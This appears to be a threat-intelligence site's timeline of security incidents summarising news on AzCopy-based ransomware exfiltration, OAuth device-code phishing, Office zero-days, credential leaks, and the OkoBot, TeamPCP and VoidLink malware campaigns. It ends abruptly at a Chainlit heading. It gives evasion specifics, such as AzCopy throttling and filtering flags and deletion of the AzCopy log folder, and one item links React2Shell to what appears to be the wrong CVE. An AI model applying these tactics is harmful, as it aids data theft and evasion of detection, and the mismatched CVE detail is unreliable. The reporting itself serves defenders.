Ransomware Groups Abuse Microsoft’s AzCopy for Stealthy Data Exfiltration Ransomware operators are exploiting Microsoft’s trusted Azure data transfer tool, AzCopy, to covertly exfiltrate sensitive data before encryption. By leveraging this legitimate utility commonly used for cloud migrations and backups attackers evade detection, blending malicious activity into routine IT operations. How the Attack Works AzCopy, a command-line utility for moving large datasets to and from Azure Storage, is rarely flagged by endpoint detection and response (EDR) solutions due to its widespread corporate trust. Threat actors, including groups like BianLian and Rhysida, use AzCopy to bulk-upload stolen files to attacker-controlled Azure Blob storage via HTTPS connections to domains like `*.blob.core.windows.net`, which often bypass firewall restrictions. Attackers gain access through compromised Azure credentials or storage keys, then generate Shared Access Signature (SAS) tokens embedded with permissions and time windows to execute transfers without interactive logins. To avoid detection, they throttle transfer speeds using the `--cap-mbps` flag and filter files with `--include-after` to target recent, high-value data. Evasion and Detection Challenges AzCopy’s use of legitimate cloud infrastructure and standard HTTPS traffic makes it difficult to distinguish from normal operations. In some cases, exfiltration went undetected by endpoint security tools, with attackers deleting local log files (`%USERPROFILE%\.azcopy`) to erase evidence. Traditional detection methods, which focus on third-party exfiltration tools, often miss these "living-off-the-land" attacks. Mitigation and Response Security teams must monitor for anomalous AzCopy activity, such as off-hours transfers or unusual data volumes under service accounts. User and Entity Behavior Analytics (UEBA) can flag abnormal file access, while network monitoring should restrict direct internet access from servers to known endpoints. Application control policies can limit AzCopy execution to approved hosts and accounts. Incident response plans should include steps to revoke SAS tokens, rotate keys, and coordinate with cloud providers to mitigate data loss. As ransomware groups increasingly weaponize trusted cloud tools, organizations must adapt detection strategies to account for legitimate utilities being turned against them.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Data exfiltration for ransomware extortion
IMPACT
Data Compromised: Sensitive dataSystems Affected: Azure Blob storage, corporate IT infrastructureOperational Impact: Potential data loss and encryption disruption
DATA BREACH
Type Of Data Compromised: Sensitive data, high-value filesSensitivity Of Data: High
MARCH 2026
391Before Incident
Breach
01 Mar 2026Microsoft Security
Paidwork: Infosec expert: Paidwork users' data pwned after 23M-record database dumped online

Massive Data Breach Exposes 23 Million Paidwork Users’ Personal and Financial Information

374After Incident
CRITICAL-17
PAI1784551106
Massive Data Breach Exposes 23 Million Paidwork Users’ Personal and Financial Information A significant data breach has compromised the personal and financial details of over 23 million users of the microtask platform Paidwork, with the exposed database surfacing online earlier this month. The incident, first detected in March, was added to Troy Hunt’s Have I Been Pwned on July 19, confirming the leak of 23,272,765 records. The breach came to light in April when a threat actor under the alias "HACKFORMETOME" advertised an 11 GB database on a cybercrime forum, claiming it contained records of 22+ million users. The seller attempted to auction the data via Telegram and Tox, though its authenticity was later verified by security researchers. The exposed data extends far beyond basic contact information, including: - Bank account numbers - Phone numbers and physical addresses - Dates of birth and profile photographs - IP addresses and device details - Financial transaction records and payout histories - Education levels - Passwords stored as bcrypt hashes (though weak passwords remain vulnerable to cracking) Paidwork, which allows users to earn small payments for tasks like watching ads, completing surveys, and testing apps, has not publicly acknowledged the breach or responded to inquiries about its authenticity. Users typically need to accumulate at least $10 before cashing out, but the breach now exposes them to heightened risks of identity theft, phishing, and financial fraud. The full scope of the incident remains unclear, as Paidwork has yet to issue an official statement or confirm remediation efforts.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
Financial Gain
IMPACT
Data Compromised: 23,272,765 recordsBrand Reputation Impact: HighIdentity Theft Risk: HighPayment Information Risk: High
DATA BREACH
Bank account numbersPhone numbersPhysical addressesDates of birthProfile photographsIP addressesDevice detailsFinancial transaction recordsPayout historiesEducation levelsPasswords (bcrypt hashes)Number Of Records Exposed: 23,272,765Sensitivity Of Data: HighData Exfiltration: YesData Encryption: Partial (bcrypt hashes)Personally Identifiable Information: Yes
Cyber Attack
01 Mar 2026Microsoft Security
Microsoft: Microsoft 365 Tokens Stolen Through OAuth Device Authorization Attacks

OAuth Device Code Phishing Emerges as a Major Cybersecurity Threat

374After Incident
CRITICAL-17
MIC1778840862
OAuth Device Code Phishing Emerges as a Major Cybersecurity Threat Cybercriminals are increasingly shifting from traditional credential theft to OAuth device code phishing, a stealthy attack method that bypasses multi-factor authentication (MFA) to hijack corporate accounts. By exploiting legitimate Microsoft 365 authorization flows, threat actors steal access tokens, enabling account takeovers, email compromise, and ransomware deployment all without needing a victim’s password. Previously a niche red-team tactic, this attack vector has surged in scale, fueled by AI-driven phishing kits and Phishing-as-a-Service (PhaaS) platforms like EvilTokens, Tycoon, and ODx. These kits, sold on Telegram, provide cybercriminals with dynamic code generation, AI-crafted landing pages mimicking trusted brands (e.g., DocuSign, Adobe, SharePoint), and pre-built infrastructure for large-scale campaigns. A key evolution in this threat is the real-time generation of device codes once short-lived (15 minutes), these codes are now dynamically created the moment a victim clicks a malicious link. Victims are directed to Microsoft’s legitimate device login portal, where they unknowingly authorize the attacker’s access. Since the process uses official Microsoft endpoints, traditional security training (e.g., spotting fake URLs) is ineffective. Notable threat actors, including the financially motivated group TA4903, have abandoned older business email compromise (BEC) tactics in favor of these kits. Recent campaigns have impersonated HR departments or federal courts, using malicious QR codes embedded in PDFs to evade email filters. While attackers leverage advanced AI tools, poor operational security often exposes their infrastructure. However, detection remains challenging, as victims interact with genuine Microsoft pages. Mitigation strategies recommended by researchers include: - Blocking device code authorization entirely via Conditional Access policies. - Allow-listing device code usage to approved networks or compliant devices if blocking isn’t feasible. Security teams can reference Indicators of Compromise (IOCs) such as domains like onedrive-7tu[.]techroboticslabmade-techie-com-s-account[.]workers[.]dev to hunt for malicious activity. These IOCs, observed as recently as May 2026, highlight the ongoing evolution of this threat.
INCIDENT DETAILS -
TYPE
Phishing
MOTIVATION
Financial gain
IMPACT
Data Compromised: Access tokens, corporate accounts, email dataSystems Affected: Microsoft 365 accountsOperational Impact: Account takeovers, email compromise, ransomware deploymentIdentity Theft Risk: High
DATA BREACH
Type Of Data Compromised: Access tokens, corporate account data, email dataSensitivity Of Data: High
FEBRUARY 2026
389Before Incident
Vulnerability
10 Feb 2026Microsoft Security
Microsoft: Cyber Security News ®’s Post

Microsoft Word Zero-Day Vulnerability (CVE-2026-21514) Exploited in the Wild

386After Incident
CRITICAL-3
MIC1770865108
Microsoft Word Zero-Day Vulnerability (CVE-2026-21514) Exploited in the Wild On February 10, 2026, security researchers disclosed CVE-2026-21514, a critical zero-day vulnerability in Microsoft Word that allows attackers to bypass key security protections. The flaw, classified under CWE-807 (improper security decision-making based on untrusted inputs), exploits weaknesses in how Word processes Object Linking and Embedding (OLE) controls. OLE enables documents to embed and interact with external objects, but the vulnerability permits attackers to circumvent Microsoft’s mitigations against malicious COM/OLE controls. This bypass could facilitate unauthorized code execution or further exploitation when users open specially crafted documents. Reports confirm active exploitation in the wild, with threat actors leveraging the flaw to deliver phishing attacks via compromised enterprise email accounts. The vulnerability poses a significant risk to organizations relying on Microsoft Office for document processing, particularly those handling sensitive or high-value data. Microsoft has not yet released a patch for CVE-2026-21514, leaving users exposed until an official fix is deployed. Security teams are advised to monitor for updates and implement mitigations where possible.
INCIDENT DETAILS -
TYPE
Zero-Day Vulnerability Exploitation
IMPACT
Systems Affected: Microsoft Word (OLE/COM processing)Operational Impact: Potential unauthorized code execution
FEBRUARY 2026
482Before Incident
Ransomware
09 Feb 2026Microsoft Security
Microsoft: Cyber Security News ®’s Post

Ransomware Threat Actors Exploit Windows Minifilter Drivers for Evasion

385After Incident
CRITICAL-97
MIC1770623528
Ransomware Threat Actors Exploit Windows Minifilter Drivers for Evasion Ransomware remains the most financially destructive cyberattack targeting organizations globally. A key defensive tool in Windows minifilter drivers has become a double-edged sword in this battle. Positioned within the file system I/O pipeline, minifilters enable real-time monitoring, interception, and blocking of malicious file operations, serving as a critical early-warning mechanism for endpoint detection and response (EDR) systems. The Filter Manager, a kernel-mode component, simplifies minifilter development by providing a robust API, eliminating the need for legacy filter drivers. However, operating in kernel-mode (Ring 0) introduces significant risks. Poorly coded callbacks or conflicts in driver "altitude" can trigger Blue Screens of Death (BSOD) on critical servers, undermining security rather than enhancing it. Threat actors are increasingly exploiting these vulnerabilities through BYOVD (Bring Your Own Vulnerable Driver) attacks, which disable or blind minifilters to evade detection. While minifilters offer strong visibility into file activity, their effectiveness hinges on stability if the security agent crashes the OS before the attacker does, the defense fails. This tactic highlights a growing trend in ransomware operations, where adversaries target foundational security mechanisms to bypass protections and maximize impact.
INCIDENT DETAILS -
TYPE
Ransomware
MOTIVATION
Financial gain
IMPACT
Systems Affected: Windows-based systems with minifilter driversDowntime: Potential system crashes (BSOD)Operational Impact: Disruption of endpoint detection and response (EDR) systems
FEBRUARY 2026
497Before Incident
Cyber Attack
01 Feb 2026Microsoft Security
Stryker: U.S. medical equipment company Stryker says cyberattack disrupted its global networks

Stryker Cyberattack Disrupts Global Medical Equipment Operations

480After Incident
CRITICAL-17
STR1773260617
Stryker Cyberattack Disrupts Global Medical Equipment Operations U.S.-based medical technology giant Stryker confirmed that a cyberattack disrupted its global networks, impacting operations across its systems. The incident, disclosed in recent reports, highlights growing cybersecurity threats targeting critical healthcare infrastructure. Stryker, a leading manufacturer of surgical equipment, implants, and medical devices, has not released details on the nature of the attack, its origin, or whether ransomware or data exfiltration was involved. The company has not specified the duration of the disruption or the extent of the operational impact, though such incidents often lead to delays in production, supply chain interruptions, and potential risks to patient care. The attack underscores the vulnerability of healthcare and medical device companies to cyber threats, which have increasingly become high-value targets for malicious actors. No further updates on recovery efforts or regulatory responses have been provided at this time.
INCIDENT DETAILS -
TYPE
cyberattack
IMPACT
Systems Affected: global networksOperational Impact: delays in production, supply chain interruptions, potential risks to patient care
JANUARY 2026
500Before Incident
Vulnerability
29 Jan 2026Microsoft Security
Microsoft: Russian Hackers Weaponize Microsoft Office Bug in Just 3 Days

Russian APT28 Exploits Microsoft Office Zero-Day Within Days of Patch Release

497After Incident
CRITICAL-3
MIC1770195437
Russian APT28 Exploits Microsoft Office Zero-Day Within Days of Patch Release Russia-linked advanced persistent threat (APT) group APT28 (also known as Fancy Bear, Sofacy, or Sednit) has rapidly weaponized CVE-2026-21509, a recently patched zero-day vulnerability in Microsoft Office, to conduct cyber-espionage attacks targeting organizations in Central and Eastern Europe. The flaw, a security feature bypass in Microsoft 365 and Office, allows attackers to execute arbitrary code via unsafe COM/OLE behavior. Microsoft released a patch on January 26, 2026, after confirming active exploitation, and the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added it to its Known Exploited Vulnerabilities Catalog the same day. APT28 began exploiting the vulnerability just three days later, on January 29, as part of a campaign tracked by Zscaler as Operation Neusploit. The attacks use malicious Microsoft Rich Text Format (RTF) documents to trigger a multistage infection chain, delivering payloads designed to steal emails and establish persistence on compromised systems. ### Key Attack Details - Exploitation Method: APT28 leverages phishing lures in English, Romanian, Slovak, and Ukrainian, employing server-side filtering to deliver malicious DLLs only to targeted regions and systems with expected headers. - Malware Payloads: - MiniDoor: A lightweight Visual Basic for Applications (VBA) tool designed to exfiltrate emails from Microsoft Outlook. - PixyNetLoader: A more complex dropper that deploys nested malicious code, ultimately loading a Covenant Grunt backdoor (a repurposed penetration testing tool). - Command-and-Control (C2): APT28 abuses Filen.io, a legitimate cloud service, for C2 communications, prompting recommendations to monitor or block related traffic. - Evasion Techniques: The attack chain includes WebDAV downloads, COM hijacking, shellcode hidden in PNG files, and the use of the Covenant framework for post-exploitation. ### Impact & Response Security researchers, including Zscaler’s Deepen Desai and Xcape’s Noelle Murata, emphasize the speed and sophistication of APT28’s exploitation. While no other threat groups have been observed abusing the flaw yet, proof-of-concept (PoC) exploits have been released, increasing the risk of broader adoption. Microsoft has provided registry configurations to mitigate the vulnerability, though organizations must restart Office applications for protections to take effect. The incident underscores the rapid weaponization of vulnerabilities by state-sponsored actors, particularly those with the resources to exploit complex flaws before widespread patching occurs.
INCIDENT DETAILS -
TYPE
Cyber-Espionage
MOTIVATION
Espionage
IMPACT
Data Compromised: Emails, System PersistenceSystems Affected: Microsoft Office, Microsoft 365, Microsoft OutlookOperational Impact: Email exfiltration, Backdoor establishment
DATA BREACH
Type Of Data Compromised: EmailsSensitivity Of Data: High (Potential classified or sensitive communications)Data Exfiltration: Yes (MiniDoor tool for email exfiltration)File Types Exposed: RTF, DLL, PNG (shellcode)
JANUARY 2026
673Before Incident
Breach
23 Jan 2026Microsoft Security
Yahoo, Facebook, TikTok, Netflix, Microsoft Outlook, OnlyFans, Binance and Canadian service provider: Massive Data Breach Exposes 149 Million User Passwords For Gmail, Facebook, & More

Massive Credential Breach Exposes 149 Million Logins in Unsecured Database

499After Incident
CRITICAL-174
YAHFACTIKNETMICONLBINCAN1769189638
Massive Credential Breach Exposes 149 Million Logins in Unsecured Database A security researcher recently uncovered a staggering data exposure involving 149 million usernames and passwords left unprotected on the internet. The database, hosted by a Canadian service provider, was freely accessible via a standard web browser, allowing anyone to search and extract sensitive login details without authentication. The breach remained active for about a month, with new credentials continuously added before the hosting provider took it offline following notification. The compromised data spanned a wide range of platforms, including: - Email services: 48 million Gmail, 4 million Yahoo, and 1.5 million Microsoft Outlook accounts - Social media: 17 million Facebook, 780,000 TikTok, and 100,000 OnlyFans logins - Streaming & entertainment: 3.4 million Netflix subscriptions - Financial services: 420,000 Binance cryptocurrency accounts, along with banking and credit card details - Government & education: 1.4 million .edu domain credentials and other official systems Investigators traced the breach to infostealing malware, which infects devices through phishing, malicious downloads, or compromised websites. The malware logs keystrokes and captures login credentials, funneling them into centralized databases like the one discovered. Each entry included unique identifiers, suggesting the database was designed for large-scale criminal operations, such as account takeovers or ransomware attacks. The implications of this breach are severe, with risks ranging from identity theft and financial fraud to potential espionage via compromised government and academic accounts. The incident reflects a broader trend of unsecured databases and the growing accessibility of cybercrime tools renting infrastructure for such operations can cost as little as $200–$300 per month, enabling even low-skilled threat actors to amass vast troves of data. While no immediate exploits have been confirmed, the exposure underscores persistent vulnerabilities in data security practices. Similar breaches have repeatedly demonstrated how quickly stolen credentials circulate on underground forums, prolonging the threat long after the initial leak. The full impact of this incident may unfold over time as attackers exploit the exposed information.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
Financial Gain, Account Takeovers, Ransomware Attacks
IMPACT
Data Compromised: 149 million usernames and passwordsSystems Affected: Email services, social media, streaming, financial services, government/education accountsBrand Reputation Impact: HighIdentity Theft Risk: HighPayment Information Risk: High
DATA BREACH
UsernamesPasswordsBanking/Credit Card DetailsNumber Of Records Exposed: 149 millionSensitivity Of Data: HighPersonally Identifiable Information: Yes
Breach
23 Jan 2026Microsoft Security
Netflix, Facebook, TikTok, Binance, OnlyFans, Microsoft Outlook, Apple iCloud, Consumer Banks and Government Systems: 149 million login details leaked via unsecured database

Massive Exposed Database Containing 149 Million Credentials Discovered Online

499After Incident
CRITICAL-174
NETFACTIKBINONLMICAPPCONGOV1769182444
Massive Exposed Database Containing 149 Million Credentials Discovered Online Security researcher Jeremiah Fowler uncovered a publicly accessible database containing 149 million usernames and passwords, including credentials for major platforms and sensitive systems. The unsecured collection, which was freely accessible via a web browser, included 48 million Gmail accounts, 17 million Facebook logins, 420,000 Binance credentials, 3.4 million Netflix accounts, 780,000 TikTok logins, and 100,000 OnlyFans accounts. Additionally, it held 1.5 million Microsoft Outlook, 900,000 Apple iCloud, and 1.4 million .edu credentials, along with login details for government systems and consumer bank accounts. Fowler reported the database to the Canadian hosting provider, which took it offline after nearly a month for violating its terms of service. During this period, the database continued to grow, suggesting ongoing data collection. Fowler suspects the credentials were harvested via infostealing malware, which logs keystrokes when victims enter login details on compromised sites. The discovery highlights the thriving infostealer market, where stolen credentials are sold for as little as $10 per log on the dark web. The simplicity of such malware makes it a popular tool for cybercriminals, enabling large-scale credential theft with minimal effort. The incident underscores the risks of unsecured databases and the widespread impact of infostealer-driven breaches.
INCIDENT DETAILS -
TYPE
Data Breach
MOTIVATION
Financial Gain
IMPACT
Data Compromised: 149 million credentialsBrand Reputation Impact: HighIdentity Theft Risk: HighPayment Information Risk: High
DATA BREACH
UsernamesPasswordsNumber Of Records Exposed: 149 millionSensitivity Of Data: HighPersonally Identifiable Information: Yes
JANUARY 2026
676Before Incident
Vulnerability
13 Jan 2026Microsoft Security
Microsoft: Cyber Security News ®’s Post

Microsoft SQL Server Elevation of Privilege Vulnerability (CVE-2026-20803)

672After Incident
LOW-4
MIC1768537039
Microsoft Patches Critical SQL Server Privilege Escalation Flaw (CVE-2026-20803) On January 13, 2026, Microsoft released security updates to address a critical elevation of privilege vulnerability in SQL Server, tracked as CVE-2026-20803. The flaw allows authenticated attackers to bypass authentication controls and gain elevated system privileges remotely, posing a significant risk to affected systems. The vulnerability stems from missing authentication mechanisms in the database engine and impacts multiple SQL Server versions, including SQL Server 2022 and 2025. With a CVSS score of 7.2, Microsoft rated the issue as "Important" severity. End-of-life SQL Server instances, which no longer receive security updates, are particularly vulnerable, as attackers actively target known weaknesses in unpatched systems. Organizations running affected versions are advised to apply the latest patches promptly. For systems that cannot be upgraded, mitigation measures such as isolation, restricted access, and heightened monitoring are recommended to reduce exposure. The flaw also introduces risks related to memory dumping in SQL Server 2022 and 2025, further emphasizing the need for immediate action.
INCIDENT DETAILS -
TYPE
Elevation of Privilege
IMPACT
Systems Affected: SQL Server 2022, SQL Server 2025, and end-of-life SQL Server versions
JANUARY 2026
691Before Incident
Cyber Attack
01 Jan 2026Microsoft Security
Microsoft, Trezor, Audacity, GitHub and Ledger: OkoBot Malware Uses ClickFix and SeedHunter to Steal Ledger and Trezor Seed Phrases

New OkoBot Malware Framework Targets Cryptocurrency Users with Advanced Theft Tactics

675After Incident
CRITICAL-16
LEDGITMICAUDTRE1784125944
New OkoBot Malware Framework Targets Cryptocurrency Users with Advanced Theft Tactics A sophisticated malware framework, OkoBot, has emerged as a major threat to cryptocurrency users, employing a multi-stage attack chain to steal recovery phrases, credentials, and wallet data. First observed in January 2026, the campaign builds on the TookPS downloader, which has been active since March 2025. OkoBot operates as a modular platform with over 202,020 payloads, allowing attackers to deploy capabilities remotely via SSH infrastructure. Initial infections occur through ClickFix social-engineering attacks and trojanized applications hosted on GitHub, including a fake Microsoft SQL Server Management Studio (SSMS) repository that delivered a malicious Audacity installer. Once executed, TookPS installs an SSH service, establishes a tunnel to attacker-controlled servers, and conducts system reconnaissance identifying security software, harvesting browser data, and preparing for deeper compromise. The malware also enables remote desktop (RDP) access by modifying firewall rules, creating backdoor user accounts, and patching termsrv.dll to allow concurrent sessions. A key component, HDUtil, bypasses User Account Control (UAC) using Windows RPC and msconfig.exe, while SeedHunter targets Ledger Live, Ledger Wallet, and Trezor Suite by injecting fake recovery prompts. When a victim enters their seed phrase, it is exfiltrated to moonsand[.]store and stored locally in an RC4-encrypted file. Additional plugins include: - MC Keylogger – Logs clipboard data, USB devices, and screenshots. - OkoSpyware – Records keystrokes and video streams from wallet apps and password managers. Kaspersky researchers detected hundreds of victims across 25+ countries, with the highest concentrations in Brazil, Vietnam, Canada, Mexico, and Türkiye. While attribution remains unclear, Russian-language artifacts, Rilide stealer usage, and CIS geoblocking suggest ties to Russian-speaking cybercrime groups. The malware’s ability to bypass security controls, maintain persistence, and exfiltrate sensitive data makes it a significant risk for cryptocurrency holders and organizations.
INCIDENT DETAILS -
TYPE
Malware
MOTIVATION
Financial gain
IMPACT
Recovery phrasesCredentialsWallet dataBrowser dataKeystrokesVideo streamsClipboard dataUSB device dataScreenshotsCryptocurrency wallet applications (Ledger Live, Ledger Wallet, Trezor Suite)Password managersIdentity Theft Risk: HighPayment Information Risk: High
DATA BREACH
Recovery phrasesCredentialsWallet dataBrowser dataPersonally identifiable informationSensitivity Of Data: HighData Exfiltration: Yes (to moonsand[.]store)Data Encryption: RC4-encrypted files (local storage)Personally Identifiable Information: Yes
DECEMBER 2025
708Before Incident
Cyber Attack
26 Dec 2025Microsoft Security
Oracle Cloud, Azure and AWS: TeamPCP Turns Cloud Infrastructure into Crime Bots

TeamPCP Exploits Cloud Misconfigurations in Large-Scale Cybercrime Operation

691After Incident
CRITICAL-17
AMAORAMIC1770695748
TeamPCP Exploits Cloud Misconfigurations in Large-Scale Cybercrime Operation A threat actor known as TeamPCP (also operating under aliases like PCPcat and ShellForce) is conducting automated, worm-like attacks on misconfigured and exposed cloud management services, compromising at least 60,000 servers worldwide since late December. The group’s campaign primarily targets Azure (60% of attacks), AWS (37%), and Google and Oracle cloud environments, exploiting well-documented vulnerabilities and misconfigurations rather than developing new attack methods. TeamPCP’s operations involve scanning for exposed Docker APIs, Kubernetes clusters, Ray dashboards, and systems with leaked secrets (such as `.env` files). Once inside, the group deploys malicious Python and Shell scripts to install proxies, tunneling software, and persistence mechanisms, effectively converting compromised infrastructure into a self-propagating botnet. A key tool in their arsenal is the React2Shell vulnerability (CVE-2025-29927), which allows remote command execution and data exfiltration. The group monetizes its attacks through multiple revenue streams, including: - Cryptocurrency mining using hijacked compute resources. - Data theft and extortion, with stolen records including personal IDs, employment records, and résumés published on a leak site operated by an affiliate, ShellForce. - Selling access to compromised systems for use as proxies or command-and-control infrastructure. - Ransomware deployment, leveraging infected systems as launchpads for further attacks. Notably, TeamPCP has targeted JobsGO, a Vietnamese recruitment platform, exfiltrating over two million records containing sensitive personal and professional data. Most victims are located in South Korea, Canada, the U.S., Serbia, and the UAE, with stolen information often used for phishing, impersonation, or account takeovers. Despite its sophistication, TeamPCP’s techniques are not novel the group relies on automated exploitation of known vulnerabilities and recycled tooling. Security firm Flare warns that the threat actor’s strength lies in its large-scale automation, turning exposed cloud infrastructure into a distributed criminal ecosystem. The group also maintains a Telegram channel (launched in November, with ~700 members) for updates and reputation-building, though researchers suggest it may have operated under previous aliases. The campaign underscores the risks of unsecured cloud control planes, leaked credentials, and poor access controls, as TeamPCP continues to industrialize existing attack vectors with alarming efficiency.
INCIDENT DETAILS -
TYPE
Cloud Misconfiguration ExploitationBotnetData TheftRansomware
MOTIVATION
Financial gainData extortionCryptocurrency miningSelling access to compromised systems
IMPACT
Data Compromised: Over two million records (personal IDs, employment records, résumés)Systems Affected: 60,000+ servers worldwideOperational Impact: Compromised infrastructure converted into a botnet for further attacksIdentity Theft Risk: High (personal and professional data used for phishing, impersonation, or account takeovers)
DATA BREACH
Personal IDsEmployment recordsRésumésNumber Of Records Exposed: Over two millionSensitivity Of Data: High (personally identifiable and professional information)
DECEMBER 2025
731Before Incident
Cyber Attack
25 Dec 2025Microsoft Security
Microsoft Azure and TeamPCP: TeamPCP Turns Cloud Misconfigurations Into Scalable Cybercrime Engine

TeamPCP Large-Scale Cloud Exploitation Campaign Targeting Misconfigured Infrastructure

691After Incident
CRITICAL-40
MICPAC1770804753
TeamPCP Launches Large-Scale Cloud Exploitation Campaign Targeting Misconfigured Infrastructure A threat group tracked as TeamPCP (also known as PCPcat, ShellForce, and DeadCatx3) has orchestrated a widespread cloud exploitation campaign, converting vulnerable cloud infrastructure into a self-propagating cybercrime platform. Active since late 2025, the group focuses on exposed cloud control planes rather than traditional endpoint malware, leveraging weak configurations and publicly accessible management interfaces for initial access. The campaign peaked around December 25, 2025, with hundreds of compromised servers running attacker-controlled containers. Researchers identified at least 185 confirmed Docker compromises in one phase, though the true scale is likely far larger. Targets include exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and applications vulnerable to React2Shell (CVE-2025-29927). ### Automated Worm-Like Propagation At the core of the operation is proxy.sh, a script that deploys tunneling tools (FRPS, gost), scanners, and persistence mechanisms. If running inside Kubernetes, it executes kube.py, which enumerates cluster resources, harvests credentials, and spreads laterally via privileged DaemonSets that mount host filesystems. Another module, react.py, exploits React2Shell vulnerabilities in Next.js applications, extracting environment variables, cloud credentials, SSH keys, and Git tokens before exfiltrating data to attacker-controlled servers. A high-volume scanner, pcpcat.py, pulls CIDR ranges from public cloud providers and automatically deploys malicious containers on exposed Docker and Ray APIs, creating a worm-like feedback loop where each infected system becomes a new propagation node. ### Hybrid Monetization: Mining, Proxies, and Data Theft TeamPCP repurposes compromised servers for multiple revenue streams: - Cryptomining (XMRig, often obfuscated with double base64 encoding) - Proxy and tunneling infrastructure - C2 relays and internet scanning platforms - Data theft staging servers While mining revenue appears modest, the group has leaked sensitive data, including 2.3 million job applicant records from a recruitment platform, containing names, birthdates, employment histories, and contact details. ### Cloud-First Targeting Strategy Most compromised infrastructure is hosted on public cloud providers, with Azure accounting for 61% of observed victims and AWS 36%. The campaign demonstrates the industrialization of known weaknesses abusing exposed Docker, Kubernetes, and Redis services rather than relying on novel exploits. Defensive measures against such attacks include restricting public access to management APIs, enforcing authentication, preventing privileged containers, and monitoring for unauthorized DaemonSets and job submissions.
INCIDENT DETAILS -
TYPE
Cloud Exploitation Campaign
MOTIVATION
CryptominingProxy and tunneling infrastructureC2 relaysData theftMonetization
IMPACT
Data Compromised: 2.3 million job applicant records (names, birthdates, employment histories, contact details)Systems Affected: Hundreds of compromised serversOperational Impact: Compromised servers repurposed for malicious activitiesIdentity Theft Risk: High (due to PII exposure)
DATA BREACH
Personally Identifiable Information (PII)Employment historiesContact detailsNumber Of Records Exposed: 2.3 millionSensitivity Of Data: High
DECEMBER 2025
746Before Incident
Cyber Attack
01 Dec 2025Microsoft Security
Alibaba Cloud, Tencent Cloud, AWS, Microsoft Azure, LangFlow and NVIDIA: VoidLink Malware Framework Targets Kubernetes and AI Workloads in New Cyber Attack Wave

VoidLink Malware Framework Exposes Critical Gaps in Kubernetes and AI Workload Security

729After Incident
CRITICAL-17
KUBNVITENALIAMAMIC1772627215
VoidLink Malware Framework Exposes Critical Gaps in Kubernetes and AI Workload Security In December 2025, Check Point Research disclosed VoidLink, a sophisticated Linux malware framework designed to infiltrate cloud-native and AI workloads, marking a shift in how threat actors target modern infrastructure. Developed by the previously unknown advanced persistent threat (APT) group UAT-9921 active since at least 2019 VoidLink is purpose-built for stealthy, long-term persistence in containerized and Kubernetes environments, rather than repurposed from legacy Windows tooling. The malware employs advanced evasion techniques, including rootkit-style tactics, in-memory execution, self-modifying code, and anti-analysis checks to remain fileless and undetectable by traditional security tools. It fingerprints its environment to identify major cloud providers (AWS, GCP, Azure, Alibaba, Tencent) and adapts its behavior based on whether it runs on bare metal, VMs, Docker containers, or Kubernetes pods. Once deployed typically via stolen credentials or exploited enterprise services like Java serialization flaws VoidLink harvests cloud metadata, credentials, and secrets, enabling command-and-control (C2), lateral movement, and internal reconnaissance. Cisco Talos highlighted VoidLink’s compile-on-demand capability, describing it as a near-production-ready foundation for AI-enabled attack frameworks that dynamically generate tools for operators. The framework’s design, deemed "defense contractor-grade," underscores a broader trend: adversaries are increasingly focusing on Kubernetes, microservices, and AI workloads as primary attack surfaces. Recent campaigns reflect this evolution. ShadowRay 2.0 and the TeamPCP worm have weaponized AI infrastructure, hijacking GPU clusters and Kubernetes environments to create self-propagating botnets using LLM-generated payloads and privileged DaemonSets. Meanwhile, container escape vulnerabilities like NVIDIAScape (CVE-2025-23266) demonstrated how minor Dockerfile misconfigurations could grant host-level root access, with researchers estimating exposure in over a third of cloud environments. The AI supply chain is also under siege, with threats ranging from LangFlow RCE enabling remote code execution and account takeovers to malicious Keras models executing arbitrary code when loaded from public repositories. Security researchers have identified nearly 100 poisoned machine-learning models on trusted platforms, revealing how even "safe" AI assets can conceal backdoors. Industry data underscores the urgency: Red Hat reports that 90% of organizations experienced at least one Kubernetes security incident in the past year, while container-based lateral movement in Kubernetes environments surged in 2025. VoidLink’s evasion tactics encrypting code, operating in memory, and tampering with user-space observability exploit a critical blind spot in many security programs. Traditional detection methods, reliant on user-space agents and log-based monitoring, struggle to counter threats designed to bypass them. To address this gap, runtime security solutions like Hypershield developed by Isovalent (now part of Cisco) leverage eBPF to provide kernel-level observability and enforcement. By deploying eBPF programs in the Linux kernel, Hypershield monitors process execution, syscalls, file access, and network activity in real time, mapping events to Kubernetes namespaces, pods, and workload identities. Cisco’s analysis demonstrates how Hypershield can track and mitigate VoidLink across its kill chain, circumventing the malware’s evasion tactics by detecting behavior directly at the kernel level. The rise of VoidLink and similar threats such as AI-driven botnets and supply chain exploits highlights a stark reality: many organizations lack visibility and control within Kubernetes environments, where AI models and core business workloads operate. While investments in endpoint, identity, and cloud monitoring have grown, they have not kept pace with the shift to workload-centric security. Integrating kernel-level runtime telemetry into SOC workflows is now critical to detecting and containing these attacks in real time. Cisco’s approach combines Hypershield’s eBPF-based enforcement with platforms like Splunk to correlate workload signals with broader security operations, offering a model for defending against cloud-native, AI-aware threats.
INCIDENT DETAILS -
TYPE
Malware Framework
IMPACT
Cloud metadataCredentialsSecretsKubernetes environmentsContainerized workloadsAI workloadsGPU clustersOperational Impact: Lateral movement, internal reconnaissance, and command-and-control (C2) operations
DATA BREACH
Cloud metadataCredentialsSecretsSensitivity Of Data: HighData Encryption: Malware uses encryption for evasion
NOVEMBER 2025
750Before Incident
Vulnerability
23 Nov 2025Microsoft Security
Microsoft: Chainlit AI Framework Flaws Enable Data Theft via File Read and SSRF Bugs

Critical Vulnerabilities in Chainlit AI Framework Expose Sensitive Data and Enable Lateral Movement

746After Incident
CRITICAL-4
MIC1769023724
